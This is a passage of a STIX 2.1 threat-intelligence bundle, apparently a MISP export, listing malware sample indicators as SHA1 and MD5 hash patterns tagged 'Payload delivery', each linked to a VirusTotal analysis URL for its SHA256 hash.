]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db816a-0edc-4df3-a45e-475802de0b81",
|
|
"value": "https://www.virustotal.com/file/a1f766bbb2beae7a1211003e3b3e63f006ed28a1b7fb2e1549af1ffa2f0f477b/analysis/1484190062/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db816b-dc60-4e6f-81bd-4e5b02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:03.000Z",
|
|
"modified": "2017-03-29T09:42:03.000Z",
|
|
"description": "sample - Xchecked via VT: 69d69ef813c95e73881b8c0c567652f4c4c208d25ba778760f8becf79ac924e3",
|
|
"pattern": "[file:hashes.SHA1 = 'f49423c1ed9b2f27c19913c735c7db11ada12c19']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:03Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db816b-45cc-4d26-a7c2-449d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:03.000Z",
|
|
"modified": "2017-03-29T09:42:03.000Z",
|
|
"description": "sample - Xchecked via VT: 69d69ef813c95e73881b8c0c567652f4c4c208d25ba778760f8becf79ac924e3",
|
|
"pattern": "[file:hashes.MD5 = '23fec38816aef5e1153db2d1574f5db8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:03Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db816c-5de0-4b13-b24d-42c402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:04.000Z",
|
|
"modified": "2017-03-29T09:42:04.000Z",
|
|
"first_observed": "2017-03-29T09:42:04Z",
|
|
"last_observed": "2017-03-29T09:42:04Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db816c-5de0-4b13-b24d-42c402de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db816c-5de0-4b13-b24d-42c402de0b81",
|
|
"value": "https://www.virustotal.com/file/69d69ef813c95e73881b8c0c567652f4c4c208d25ba778760f8becf79ac924e3/analysis/1484793448/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db816e-bd64-49af-aad6-4cbb02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:06.000Z",
|
|
"modified": "2017-03-29T09:42:06.000Z",
|
|
"description": "sample - Xchecked via VT: 550b73295af24954fba98ad5a86b2fb977d57e951c3b7f5deb10189bbb26a6fc",
|
|
"pattern": "[file:hashes.SHA1 = 'd11c28b76b704871736999e0b1e89f9ae7664fc7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:06Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db816f-a6b0-45a2-abbd-4c5702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:07.000Z",
|
|
"modified": "2017-03-29T09:42:07.000Z",
|
|
"description": "sample - Xchecked via VT: 550b73295af24954fba98ad5a86b2fb977d57e951c3b7f5deb10189bbb26a6fc",
|
|
"pattern": "[file:hashes.MD5 = '26995803275c7b58ce8df20af8f6f7f0']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:07Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db816f-c45c-4dd7-85ad-431702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:07.000Z",
|
|
"modified": "2017-03-29T09:42:07.000Z",
|
|
"first_observed": "2017-03-29T09:42:07Z",
|
|
"last_observed": "2017-03-29T09:42:07Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db816f-c45c-4dd7-85ad-431702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db816f-c45c-4dd7-85ad-431702de0b81",
|
|
"value": "https://www.virustotal.com/file/550b73295af24954fba98ad5a86b2fb977d57e951c3b7f5deb10189bbb26a6fc/analysis/1490329244/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8170-48b4-4b6d-a8e4-409802de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:08.000Z",
|
|
"modified": "2017-03-29T09:42:08.000Z",
|
|
"description": "sample - Xchecked via VT: 0f710fb601b78993e28808184c8e868a474dcb679d61bd80e01f215eecf22f83",
|
|
"pattern": "[file:hashes.SHA1 = 'b9c188c31b7f2f2b1b05476ce8b3ecdc8f30d825']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:08Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8171-e470-455d-a28e-460d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:09.000Z",
|
|
"modified": "2017-03-29T09:42:09.000Z",
|
|
"description": "sample - Xchecked via VT: 0f710fb601b78993e28808184c8e868a474dcb679d61bd80e01f215eecf22f83",
|
|
"pattern": "[file:hashes.MD5 = '6aeaf64e00fcb49bc6372730f0239163']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:09Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8172-f078-4630-a811-42f602de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:10.000Z",
|
|
"modified": "2017-03-29T09:42:10.000Z",
|
|
"first_observed": "2017-03-29T09:42:10Z",
|
|
"last_observed": "2017-03-29T09:42:10Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8172-f078-4630-a811-42f602de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8172-f078-4630-a811-42f602de0b81",
|
|
"value": "https://www.virustotal.com/file/0f710fb601b78993e28808184c8e868a474dcb679d61bd80e01f215eecf22f83/analysis/1427799046/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8173-6dec-41ba-a9d5-444502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:11.000Z",
|
|
"modified": "2017-03-29T09:42:11.000Z",
|
|
"description": "sample - Xchecked via VT: 444dfc3bbb7406135002e3b6a75e48cd4ac40bb3213f9ba4836ad202e5fcea4a",
|
|
"pattern": "[file:hashes.SHA1 = 'c916b9cfc475a08c721a066dddd35371e13d669c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:11Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8174-0430-4625-8bd8-475202de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:12.000Z",
|
|
"modified": "2017-03-29T09:42:12.000Z",
|
|
"description": "sample - Xchecked via VT: 444dfc3bbb7406135002e3b6a75e48cd4ac40bb3213f9ba4836ad202e5fcea4a",
|
|
"pattern": "[file:hashes.MD5 = 'a448ff66f0d31bd575598aadc7f66972']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:12Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8175-6568-4074-89e0-464102de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:13.000Z",
|
|
"modified": "2017-03-29T09:42:13.000Z",
|
|
"first_observed": "2017-03-29T09:42:13Z",
|
|
"last_observed": "2017-03-29T09:42:13Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8175-6568-4074-89e0-464102de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8175-6568-4074-89e0-464102de0b81",
|
|
"value": "https://www.virustotal.com/file/444dfc3bbb7406135002e3b6a75e48cd4ac40bb3213f9ba4836ad202e5fcea4a/analysis/1427777491/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8176-a518-4246-a6af-48de02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:14.000Z",
|
|
"modified": "2017-03-29T09:42:14.000Z",
|
|
"description": "sample - Xchecked via VT: 1d130eee41544ea7389f90a1cc19d2535ab5236985912c3cc000e5a9d2416e81",
|
|
"pattern": "[file:hashes.SHA1 = 'f5e074552f8d7b48100328f7f0995daecacc8ecd']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:14Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8177-4948-4aa5-9785-4e5e02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:15.000Z",
|
|
"modified": "2017-03-29T09:42:15.000Z",
|
|
"description": "sample - Xchecked via VT: 1d130eee41544ea7389f90a1cc19d2535ab5236985912c3cc000e5a9d2416e81",
|
|
"pattern": "[file:hashes.MD5 = '8e83b1454ca3148a2d16634bcd2dbbe5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:15Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8178-fb10-45ea-899c-478502de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:16.000Z",
|
|
"modified": "2017-03-29T09:42:16.000Z",
|
|
"first_observed": "2017-03-29T09:42:16Z",
|
|
"last_observed": "2017-03-29T09:42:16Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8178-fb10-45ea-899c-478502de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8178-fb10-45ea-899c-478502de0b81",
|
|
"value": "https://www.virustotal.com/file/1d130eee41544ea7389f90a1cc19d2535ab5236985912c3cc000e5a9d2416e81/analysis/1435205983/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8179-a62c-4780-80d4-43ec02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:17.000Z",
|
|
"modified": "2017-03-29T09:42:17.000Z",
|
|
"description": "sample - Xchecked via VT: d24c97b62ed06288d3887dd9b720da4900e8703360fe48d62899e6ee156eda20",
|
|
"pattern": "[file:hashes.SHA1 = '575e064df34515a34ff50e733f997107373897c5']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:17Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db817a-b82c-4af7-92fa-4ec902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:18.000Z",
|
|
"modified": "2017-03-29T09:42:18.000Z",
|
|
"description": "sample - Xchecked via VT: d24c97b62ed06288d3887dd9b720da4900e8703360fe48d62899e6ee156eda20",
|
|
"pattern": "[file:hashes.MD5 = '7356e5c07272449ebdefebd8d68d9ea7']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:18Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db817b-7d34-4634-9a1a-466a02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:19.000Z",
|
|
"modified": "2017-03-29T09:42:19.000Z",
|
|
"first_observed": "2017-03-29T09:42:19Z",
|
|
"last_observed": "2017-03-29T09:42:19Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db817b-7d34-4634-9a1a-466a02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db817b-7d34-4634-9a1a-466a02de0b81",
|
|
"value": "https://www.virustotal.com/file/d24c97b62ed06288d3887dd9b720da4900e8703360fe48d62899e6ee156eda20/analysis/1489997312/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db817c-dc74-4be6-8ab2-44c702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:20.000Z",
|
|
"modified": "2017-03-29T09:42:20.000Z",
|
|
"description": "sample - Xchecked via VT: 665079b17747eb20e80e97a8d8b432fd3760cbe72edba4bac5f3dc95e2576d57",
|
|
"pattern": "[file:hashes.SHA1 = 'fcdeb7b28b482074ba9fbc49a0e72c3b139797b8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:20Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db817d-9b94-43a1-8655-4b2f02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:21.000Z",
|
|
"modified": "2017-03-29T09:42:21.000Z",
|
|
"description": "sample - Xchecked via VT: 665079b17747eb20e80e97a8d8b432fd3760cbe72edba4bac5f3dc95e2576d57",
|
|
"pattern": "[file:hashes.MD5 = '3c93e1595f767da609e7acb8342aef54']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:21Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db817e-5b30-4095-a575-4b3702de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:22.000Z",
|
|
"modified": "2017-03-29T09:42:22.000Z",
|
|
"first_observed": "2017-03-29T09:42:22Z",
|
|
"last_observed": "2017-03-29T09:42:22Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db817e-5b30-4095-a575-4b3702de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db817e-5b30-4095-a575-4b3702de0b81",
|
|
"value": "https://www.virustotal.com/file/665079b17747eb20e80e97a8d8b432fd3760cbe72edba4bac5f3dc95e2576d57/analysis/1434721615/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db817f-4bcc-4772-a353-4aa402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:23.000Z",
|
|
"modified": "2017-03-29T09:42:23.000Z",
|
|
"description": "sample - Xchecked via VT: 927d28f4be7b208111298aede19ea6a33d69769081747504a2a6fc0e65596582",
|
|
"pattern": "[file:hashes.SHA1 = '65f4c4b62b16da9506c2e724966384fd09eabb4c']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:23Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8180-23d0-4915-af2c-4ae302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:24.000Z",
|
|
"modified": "2017-03-29T09:42:24.000Z",
|
|
"description": "sample - Xchecked via VT: 927d28f4be7b208111298aede19ea6a33d69769081747504a2a6fc0e65596582",
|
|
"pattern": "[file:hashes.MD5 = 'dba25c131346f3bb85a5ece2757fee86']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:24Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8181-a120-48c0-8a62-48f902de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:25.000Z",
|
|
"modified": "2017-03-29T09:42:25.000Z",
|
|
"first_observed": "2017-03-29T09:42:25Z",
|
|
"last_observed": "2017-03-29T09:42:25Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8181-a120-48c0-8a62-48f902de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8181-a120-48c0-8a62-48f902de0b81",
|
|
"value": "https://www.virustotal.com/file/927d28f4be7b208111298aede19ea6a33d69769081747504a2a6fc0e65596582/analysis/1434545335/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8182-cda8-433c-8ae5-447d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:26.000Z",
|
|
"modified": "2017-03-29T09:42:26.000Z",
|
|
"description": "sample - Xchecked via VT: 6905b72571b27eb36191c5394fdb8aa91a25561e2f65bb7f6283cd67b8b42695",
|
|
"pattern": "[file:hashes.SHA1 = '0ef7178d9ebb98ceb98293314ef39d59ff90d7d8']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:26Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8183-da18-46ee-b763-42f402de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:27.000Z",
|
|
"modified": "2017-03-29T09:42:27.000Z",
|
|
"description": "sample - Xchecked via VT: 6905b72571b27eb36191c5394fdb8aa91a25561e2f65bb7f6283cd67b8b42695",
|
|
"pattern": "[file:hashes.MD5 = 'b12ab6848b1ed5e8eb51fc6fa7d71d48']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:27Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8184-226c-4709-abc7-4a0c02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:28.000Z",
|
|
"modified": "2017-03-29T09:42:28.000Z",
|
|
"first_observed": "2017-03-29T09:42:28Z",
|
|
"last_observed": "2017-03-29T09:42:28Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8184-226c-4709-abc7-4a0c02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
"id": "url--58db8184-226c-4709-abc7-4a0c02de0b81",
|
|
"value": "https://www.virustotal.com/file/6905b72571b27eb36191c5394fdb8aa91a25561e2f65bb7f6283cd67b8b42695/analysis/1445816752/"
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8185-70f4-40b0-bf4c-49c302de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:29.000Z",
|
|
"modified": "2017-03-29T09:42:29.000Z",
|
|
"description": "sample - Xchecked via VT: 8a1d7fe6146ad99ee806586f217e067cd34d5bff7dd44d516e08576c22b1a382",
|
|
"pattern": "[file:hashes.SHA1 = 'eb9934b56f0de3d8e51cdba9e59686f216489621']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:29Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"sha1\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "indicator",
|
|
"spec_version": "2.1",
|
|
"id": "indicator--58db8186-8318-491d-baad-49ce02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:30.000Z",
|
|
"modified": "2017-03-29T09:42:30.000Z",
|
|
"description": "sample - Xchecked via VT: 8a1d7fe6146ad99ee806586f217e067cd34d5bff7dd44d516e08576c22b1a382",
|
|
"pattern": "[file:hashes.MD5 = 'b05ef7aa6563fa5184f476e39b66f297']",
|
|
"pattern_type": "stix",
|
|
"pattern_version": "2.1",
|
|
"valid_from": "2017-03-29T09:42:30Z",
|
|
"kill_chain_phases": [
|
|
{
|
|
"kill_chain_name": "misp-category",
|
|
"phase_name": "Payload delivery"
|
|
}
|
|
],
|
|
"labels": [
|
|
"misp:type=\"md5\"",
|
|
"misp:category=\"Payload delivery\"",
|
|
"misp:to_ids=\"True\""
|
|
]
|
|
},
|
|
{
|
|
"type": "observed-data",
|
|
"spec_version": "2.1",
|
|
"id": "observed-data--58db8187-f938-4c4e-bdca-4e2d02de0b81",
|
|
"created_by_ref": "identity--55f6ea5e-2c60-40e5-964f-47a8950d210f",
|
|
"created": "2017-03-29T09:42:31.000Z",
|
|
"modified": "2017-03-29T09:42:31.000Z",
|
|
"first_observed": "2017-03-29T09:42:31Z",
|
|
"last_observed": "2017-03-29T09:42:31Z",
|
|
"number_observed": 1,
|
|
"object_refs": [
|
|
"url--58db8187-f938-4c4e-bdca-4e2d02de0b81"
|
|
],
|
|
"labels": [
|
|
"misp:type=\"link\"",
|
|
"misp:category=\"External analysis\""
|
|
]
|
|
},
|
|
{
|
|
"type": "url",
|
|
"spec_version": "2.1",
|
|
